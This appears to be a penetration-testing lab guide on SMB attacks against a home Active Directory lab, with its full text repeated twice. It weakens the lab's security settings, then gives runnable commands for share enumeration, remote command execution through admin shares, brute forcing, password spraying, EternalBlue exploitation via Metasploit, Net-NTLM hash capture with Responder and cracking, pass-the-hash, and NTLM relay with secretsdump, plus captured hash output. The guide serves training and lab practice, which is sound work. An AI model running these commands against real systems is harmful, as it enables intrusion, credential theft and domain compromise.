SMB Common Attacks

Sections

SMB Intro
Making the Lab vulnerable
SMB Tools & Guest or Anonymous access to Shares
RCE Via access to Administrative Shares
SMB Brute Forcing
SMB Password Spraying
SMBv1 EternalBlue (CVE-2017-0144)
Net-NTLM Capture Attack
Pass the Hash Attack (PTH)
Net-NTLM Relay Attack
Other Resources

SMB Intro

The SMB protocol is a network file sharing protocol that allows applications on a computer to read and write to files. SMB also requests services from server programs in a computer network. It's the most critical attack vector if it's not protected well.

The v1 is deprecated and have several vulnerabilities (Eternal Blue, WannaCry, etc).

It can run over multiple ports: 445, 137-139 (NetBIOS), and over UDP.

Making the Lab vulnerable

To test it, i've created a share folder called "SharedFiles" with a text file. This directory is shared with 'devan' with read/write rights (Properties->Share->AddUser: 'devan')

Location: \\CORP-DC\SharedFiles

Then, we can access to it on Devan's workstation machine using that location

Disable SMB Signing

By default, SMB signing is enabled on Domain Controllers.

Method 1: Group Policy (Recommended)

Open Group Policy Editor (gpedit.msc).
Navigate to: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Disabled:
- "Microsoft network server: Digitally sign communications (always)"
- "Microsoft network server: Digitally sign communications (if client agrees)"
Restart the server.

Method 2: Registry (Manual)

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "EnableSecuritySignature" -Value 0
Restart-Computer -Force

Enable Guest & Anonymous Access

Method 1: Group Policy (Recommended)

Open Group Policy Editor (gpedit.msc).
Navigate to: Computer Configuration → Administrative Templates → Network → Lanman Workstation
Enable "Enable insecure guest logons".
Then, go to: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Enabled:
- "Network access: Let Everyone permissions apply to anonymous users"
- "Accounts: Guest account status"
Restart the server.

Method 2: Registry (Manual)

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictAnonymous" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "AllowInsecureGuestAuth" -Value 1
Restart-Computer -Force

Method 1: Security Policy (secpol.msc)

Open Local Security Policy (secpol.msc).
Navigate to: Security Settings → Local Policies → Security Options
Modify "Network access: Shares that can be accessed anonymously" and add "SharedFiles".
Restart the server.

Method 2: Registry (Manual)

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "NullSessionShares" -Value "SharedFiles"
Restart-Computer -Force

SMB Tools & Guest or Anonymous access to Shares

If the passwords used include special characters, the ideal way to overcome the problem would be to insert them via prompt (as well as for security reasons), in addition you can try to indicate them via "" or '' or by using escaping characters.

SMBMap

We can enumerate SMB shares and access to system using these command:

smbmap -H corp-dc #List share with anonymous access
smbmap -H corp-dc -u "devan" -p "P@ssword123!" #List Devan's shares
smbmap -H corp-dc -u "devan" --prompt ##List Devan's shares without writing password in cleartext

List a specific Share

smbmap -H corp-dc -u "devan" --prompt -r "SharedFiles"

Check OS Version and signing status

smbmap -H corp-dc -u "devan" --prompt -v            #OS version check
smbmap -H corp-dc -u "devan" --prompt --signing     #Signing check

If the signing of message is disabled we can use it for Relay attacks and potentially of exploit eternalblue vuln.

SMB Client

Similar to SMBMap, we can use it to enumerate shares and interact with file system prompt

smbclient -L //corp-dc -N     #Anonymous Login (-N no credentials)
smbclient //corp-dc -U "dev-angelist.lab/devan%P@ssword123!"     #List Devan's shares
smbclient //corp-dc/SharedFiles -U devan
smbclient //corp-dc/SharedFiles -U "dev-angelist.lab/devan%P@ssword123!" #we can get file shared using get command
#File system prompt includes command such as: cd, dir, ls, get, put

Netexec

It's a fantastic tool useful for more common protocols

nxc smb corp-dc     #Retrieve info about DC, SMB vs, OS vs, domain name and signing status
nxc smb corp-dc -u "" -p "" --users     #Try to authenticate using Null session
nxc smb corp-dc -u "AnAccountThatDoesntExist" --shares  #Try to authenticate using guest account
nxc smb corp-dc -u "devan" -p "P@ssword123!" --shares     #List Devan's shares and info about DC, SMB vs, OS vs, domain name and signing status

RCE Via access to Administrative Shares

If it's possible to access administrative shares of SMB, it might be possible to obtain Remote Code Execution (RCE)

smbmap -H corp-dc -u "administrator" -x "whoami" --prompt
smbmap -H corp-dc -u "administrator" -x "whoami /priv" --prompt
 nxc smb corp-dc -u "administrator" -p 'P@$$W0rd' -x "whoami /priv"

In this case we've execute only a whoami command, but for example we can use it for spawn a reverse shell

SMB Brute Forcing

docker run --entrypoint "/bin/bash" -v $(pwd)/wordlists:/data --network host -it evilsocket/legba:latest  #Get shell within docker
legba smb --smb-workgroup dev-angelist.lab --smb-share "C$" --username administrator --password ./passwords.txt --target corp-dc  #Bruteforce administrator password
legba smb --smb-workgroup dev-angelist.lab --smb-share "SharedFiles" --username devan --password ./passwords.txt --target corp-dc  #Bruteforce Devan's password

SMB Password Spraying

A password spraying attack involve a threat actor using a single common password against multiple accounts on the same application, because passwords are common and many times multiple users can use the same password.

We can perform it utilizing Netexec

nxc smb corp-dc -u "devan" -p passwords.txt  #Basic nxc query - we can use rockyou.txt
nxc smb ip.txt -u users.txt -p passwords.txt --continue-on-success  #password spraying on multiple IPs and users

SMBv1 EternalBlue (CVE-2017-0144)

Windows system that running SMBv1, can be vulnerable to dangerous attacks, such as EternalBlue', also known as CVE-2017-0144' or `MS-17-010'.

We can enumerate multiple configuration checking the smb version using previous tools (smbap, netexc) or though 'generic tools' such as: nmap and metasploit framework:

Nmap

nmap -p445 --script smb-vuln-ms17-010 corp-dc  #Enumerate vulnerable configuration

Metasploit

#  Scan for vulnerabilty
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS corp-dc
run
#  Exploit vulnerability
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS corp-dc
run

Other Lab

Net-NTLM Capture Attack

When a Windows client authenticates to an SMB server, the NTLM hash of the client is sent to the server for authentication. Depending on the protocol version, it is transmitted differently:

Net-NTLMv1:
- Uses a simple DES encryption scheme based on the NT hash.
Net-NTLMv2:
- Uses HMAC-MD5 and a combination of server/client challenges for stronger security.

It is possible to capture a user's Net-NTLM hash by forcing the client to authenticate against a fake SMB server.

Common attack vectors are:

Phishing real users
Exploiting a reverse shell

To set up Responder for capturing Net-NTLM hashes:

Install Responder:

python3 -m venv venv
source venv/bin/activate
pip3 install impacket netifaces
git clone https://github.com/lgandx/Responder.git

Start Responder on the victim's network interface (kali):
```
cd Responder
sudo python3 Responder.py -I eth1
```

Trigger authentication from the victim machine:

C:\> dir \\192.168.57.7\test
#Access is denied.

This will leak the Net-NTLM hash:

[SMB] NTLMv2-SSP Client   : 192.168.57.9
[SMB] NTLMv2-SSP Username : DEV-ANGELIST\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::DEV-ANGELIST:835fd92467bf9924:402A6AD80187AB11FB4365555DFD8EB3:01010000000000008050C8D5E186DB019D1CCCC0C96282C30000000002000800510051005A00370001001E00570049004E002D0039004D00560044005200430035004F0048003500460004003400570049004E002D0039004D00560044005200430035004F004800350046002E00510051005A0037002E004C004F00430041004C0003001400510051005A0037002E004C004F00430041004C0005001400510051005A0037002E004C004F00430041004C00070008008050C8D5E186DB01060004000200000008003000300000000000000000000000003000002A5FFAB95CA90DF53DDD925A77ABF2D821EC425793DF5EA240819ACB70830A4E0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00350037002E0037000000000000000000

Cracking the captured Net-NTLM hash (tools: JohnTheRipper or Hashcat):

# Net-NTLMv1
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 hash.txt rockyou.txt

# Net-NTLMv2
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 hash.txt rockyou.txt

Pass the Hash Attack (PTH)

If an attacker obtains an NTLM hash (the hash stored into memory, different than NetNTLM hash), it can be used to authenticate as the user without knowing the password.

We can obtain NTLM using tools such as Mimikatz.

Example NTLM Hash:

administrator:f193d757b4d487ab7e5a3743f038f713

Using nxc (NetExec) to authenticate:

nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713
nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713 --shares
nxc smb corp-dc -u administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE -X "whoami"

If the user of the hash is unknown, we can spray it against a list of users:

nxc smb corp-dc -u users.txt -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Net-NTLM Relay Attack

If the captured Net-NTLM hash cannot be cracked, it can be relayed to another system if SMB signing is disabled.

The NTLM relay attack has the following steps:

0) Check if SMB signing is disabled (pre-requisite)

1) Interception of Authentication Attempt

2) Capture of Net-NTLM Challenge-Reponse

3) Relay to Target SMB

4) Obtain Unauthorized Access

Check SMB signing status:

(on attacker machine)

nxc smb corp-dc     #Retrieve info about DC, SMB vs, OS vs, domain name and signing status
smbmap -H corp-dc -u "devan" --prompt --signing  #Signing check
nmap --script smb2-security-mode.nse -p 445 corp-dc  #If the output is "Message signing not required" it's vulnerable

(on target):

Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol, RequireSecuritySignature

If signing is enabled, it must be disabled via GPO or PowerShell:

Set-SmbClientConfiguration -RequireSecuritySignature $false
Set-SmbServerConfiguration -RequireSecuritySignature $false

Obtain a list of vulnerable SMB servers:

nxc smb corp-dc --gen-relay-list target_list.txt

192.168.57.9 is the correspective IP of corp-dc

Start server to replay Net-NTLM Hash

sudo ntlmrelayx.py --no-http-server -smb2support -t smb://corp-dc -socks

Trigger authentication from the victim machine:

dir \\192.168.57.7\test  #Kali Machine (192.168.57.7)

Setup Proxychains Proxy

sudo echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf

Using the authenticated session via SOCKS proxy:

proxychains lookupsid.py -no-pass -domain-sids domain/user@corp-dc
proxychains secretsdump.py -no-pass domain/user@corp-dc
proxychains smbexec.py -no-pass domain/user@corp-dc

Other Resources

PreviousAD Enumeration NextPivoting

Last updated 3 months ago

SMB Common Attacks

Sections

SMB Intro
Making the Lab vulnerable
SMB Tools & Guest or Anonymous access to Shares
RCE Via access to Administrative Shares
SMB Brute Forcing
SMB Password Spraying
SMBv1 EternalBlue (CVE-2017-0144)
Net-NTLM Capture Attack
Pass the Hash Attack (PTH)
Net-NTLM Relay Attack
Other Resources

SMB Intro

The v1 is deprecated and have several vulnerabilities (Eternal Blue, WannaCry, etc).

It can run over multiple ports: 445, 137-139 (NetBIOS), and over UDP.

Making the Lab vulnerable

To test it, i've created a share folder called "SharedFiles" with a text file. This directory is shared with 'devan' with read/write rights (Properties->Share->AddUser: 'devan')

Location: \\CORP-DC\SharedFiles

Then, we can access to it on Devan's workstation machine using that location

Disable SMB Signing

By default, SMB signing is enabled on Domain Controllers.

Method 1: Group Policy (Recommended)

Open Group Policy Editor (gpedit.msc).
Navigate to: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Disabled:
- "Microsoft network server: Digitally sign communications (always)"
- "Microsoft network server: Digitally sign communications (if client agrees)"
Restart the server.

Method 2: Registry (Manual)

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "EnableSecuritySignature" -Value 0
Restart-Computer -Force

Enable Guest & Anonymous Access

Method 1: Group Policy (Recommended)

Open Group Policy Editor (gpedit.msc).
Navigate to: Computer Configuration → Administrative Templates → Network → Lanman Workstation
Enable "Enable insecure guest logons".
Then, go to: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Enabled:
- "Network access: Let Everyone permissions apply to anonymous users"
- "Accounts: Guest account status"
Restart the server.

Method 2: Registry (Manual)

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictAnonymous" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "AllowInsecureGuestAuth" -Value 1
Restart-Computer -Force

Method 1: Security Policy (secpol.msc)

Open Local Security Policy (secpol.msc).
Navigate to: Security Settings → Local Policies → Security Options
Modify "Network access: Shares that can be accessed anonymously" and add "SharedFiles".
Restart the server.

Method 2: Registry (Manual)

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "NullSessionShares" -Value "SharedFiles"
Restart-Computer -Force

SMB Tools & Guest or Anonymous access to Shares

SMBMap

We can enumerate SMB shares and access to system using these command:

smbmap -H corp-dc #List share with anonymous access
smbmap -H corp-dc -u "devan" -p "P@ssword123!" #List Devan's shares
smbmap -H corp-dc -u "devan" --prompt ##List Devan's shares without writing password in cleartext

List a specific Share

smbmap -H corp-dc -u "devan" --prompt -r "SharedFiles"

Check OS Version and signing status

smbmap -H corp-dc -u "devan" --prompt -v            #OS version check
smbmap -H corp-dc -u "devan" --prompt --signing     #Signing check

If the signing of message is disabled we can use it for Relay attacks and potentially of exploit eternalblue vuln.

SMB Client

Similar to SMBMap, we can use it to enumerate shares and interact with file system prompt

smbclient -L //corp-dc -N     #Anonymous Login (-N no credentials)
smbclient //corp-dc -U "dev-angelist.lab/devan%P@ssword123!"     #List Devan's shares
smbclient //corp-dc/SharedFiles -U devan
smbclient //corp-dc/SharedFiles -U "dev-angelist.lab/devan%P@ssword123!" #we can get file shared using get command
#File system prompt includes command such as: cd, dir, ls, get, put

Netexec

It's a fantastic tool useful for more common protocols

nxc smb corp-dc     #Retrieve info about DC, SMB vs, OS vs, domain name and signing status
nxc smb corp-dc -u "" -p "" --users     #Try to authenticate using Null session
nxc smb corp-dc -u "AnAccountThatDoesntExist" --shares  #Try to authenticate using guest account
nxc smb corp-dc -u "devan" -p "P@ssword123!" --shares     #List Devan's shares and info about DC, SMB vs, OS vs, domain name and signing status

RCE Via access to Administrative Shares

If it's possible to access administrative shares of SMB, it might be possible to obtain Remote Code Execution (RCE)

smbmap -H corp-dc -u "administrator" -x "whoami" --prompt
smbmap -H corp-dc -u "administrator" -x "whoami /priv" --prompt
 nxc smb corp-dc -u "administrator" -p 'P@$$W0rd' -x "whoami /priv"

In this case we've execute only a whoami command, but for example we can use it for spawn a reverse shell

SMB Brute Forcing

When we're talking about login, we must talk about brute force attack. To perform this we can use tools such as Hydra or (suggested for SMB protocol and running with docker)

GitHub - evilsocket/legba: A multiprotocol credentials bruteforcer / password sprayer and enumerator. 🥷GitHub

docker run --entrypoint "/bin/bash" -v $(pwd)/wordlists:/data --network host -it evilsocket/legba:latest  #Get shell within docker
legba smb --smb-workgroup dev-angelist.lab --smb-share "C$" --username administrator --password ./passwords.txt --target corp-dc  #Bruteforce administrator password
legba smb --smb-workgroup dev-angelist.lab --smb-share "SharedFiles" --username devan --password ./passwords.txt --target corp-dc  #Bruteforce Devan's password

SMB Password Spraying

We can perform it utilizing Netexec

nxc smb corp-dc -u "devan" -p passwords.txt  #Basic nxc query - we can use rockyou.txt
nxc smb ip.txt -u users.txt -p passwords.txt --continue-on-success  #password spraying on multiple IPs and users

SMBv1 EternalBlue (CVE-2017-0144)

Windows system that running SMBv1, can be vulnerable to dangerous attacks, such as EternalBlue', also known as CVE-2017-0144' or `MS-17-010'.

We can enumerate multiple configuration checking the smb version using previous tools (smbap, netexc) or though 'generic tools' such as: nmap and metasploit framework:

Nmap

nmap -p445 --script smb-vuln-ms17-010 corp-dc  #Enumerate vulnerable configuration

Metasploit

#  Scan for vulnerabilty
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS corp-dc
run
#  Exploit vulnerability
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS corp-dc
run

Other Lab

Net-NTLM Capture Attack

When a Windows client authenticates to an SMB server, the NTLM hash of the client is sent to the server for authentication. Depending on the protocol version, it is transmitted differently:

Net-NTLMv1:
- Uses a simple DES encryption scheme based on the NT hash.
Net-NTLMv2:
- Uses HMAC-MD5 and a combination of server/client challenges for stronger security.

It is possible to capture a user's Net-NTLM hash by forcing the client to authenticate against a fake SMB server.

Common attack vectors are:

Phishing real users
Exploiting a reverse shell

To set up Responder for capturing Net-NTLM hashes:

Install Responder:

python3 -m venv venv
source venv/bin/activate
pip3 install impacket netifaces
git clone https://github.com/lgandx/Responder.git

Start Responder on the victim's network interface (kali):
```
cd Responder
sudo python3 Responder.py -I eth1
```

Trigger authentication from the victim machine:

C:\> dir \\192.168.57.7\test
#Access is denied.

This will leak the Net-NTLM hash:

[SMB] NTLMv2-SSP Client   : 192.168.57.9
[SMB] NTLMv2-SSP Username : DEV-ANGELIST\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::DEV-ANGELIST:835fd92467bf9924:402A6AD80187AB11FB4365555DFD8EB3:01010000000000008050C8D5E186DB019D1CCCC0C96282C30000000002000800510051005A00370001001E00570049004E002D0039004D00560044005200430035004F0048003500460004003400570049004E002D0039004D00560044005200430035004F004800350046002E00510051005A0037002E004C004F00430041004C0003001400510051005A0037002E004C004F00430041004C0005001400510051005A0037002E004C004F00430041004C00070008008050C8D5E186DB01060004000200000008003000300000000000000000000000003000002A5FFAB95CA90DF53DDD925A77ABF2D821EC425793DF5EA240819ACB70830A4E0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00350037002E0037000000000000000000

Cracking the captured Net-NTLM hash (tools: JohnTheRipper or Hashcat):

# Net-NTLMv1
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 hash.txt rockyou.txt

# Net-NTLMv2
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 hash.txt rockyou.txt

Pass the Hash Attack (PTH)

If an attacker obtains an NTLM hash (the hash stored into memory, different than NetNTLM hash), it can be used to authenticate as the user without knowing the password.

We can obtain NTLM using tools such as Mimikatz.

Example NTLM Hash:

administrator:f193d757b4d487ab7e5a3743f038f713

Using nxc (NetExec) to authenticate:

nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713
nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713 --shares
nxc smb corp-dc -u administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE -X "whoami"

If the user of the hash is unknown, we can spray it against a list of users:

nxc smb corp-dc -u users.txt -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Net-NTLM Relay Attack

If the captured Net-NTLM hash cannot be cracked, it can be relayed to another system if SMB signing is disabled.

The NTLM relay attack has the following steps:

0) Check if SMB signing is disabled (pre-requisite)

1) Interception of Authentication Attempt

2) Capture of Net-NTLM Challenge-Reponse

3) Relay to Target SMB

4) Obtain Unauthorized Access

Check SMB signing status:

(on attacker machine)

nxc smb corp-dc     #Retrieve info about DC, SMB vs, OS vs, domain name and signing status
smbmap -H corp-dc -u "devan" --prompt --signing  #Signing check
nmap --script smb2-security-mode.nse -p 445 corp-dc  #If the output is "Message signing not required" it's vulnerable

(on target):

Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol, RequireSecuritySignature

If signing is enabled, it must be disabled via GPO or PowerShell:

Set-SmbClientConfiguration -RequireSecuritySignature $false
Set-SmbServerConfiguration -RequireSecuritySignature $false

Obtain a list of vulnerable SMB servers:

nxc smb corp-dc --gen-relay-list target_list.txt

192.168.57.9 is the correspective IP of corp-dc

Start server to replay Net-NTLM Hash

sudo ntlmrelayx.py --no-http-server -smb2support -t smb://corp-dc -socks

Trigger authentication from the victim machine:

dir \\192.168.57.7\test  #Kali Machine (192.168.57.7)

Setup Proxychains Proxy

sudo echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf

Using the authenticated session via SOCKS proxy:

proxychains lookupsid.py -no-pass -domain-sids domain/user@corp-dc
proxychains secretsdump.py -no-pass domain/user@corp-dc
proxychains smbexec.py -no-pass domain/user@corp-dc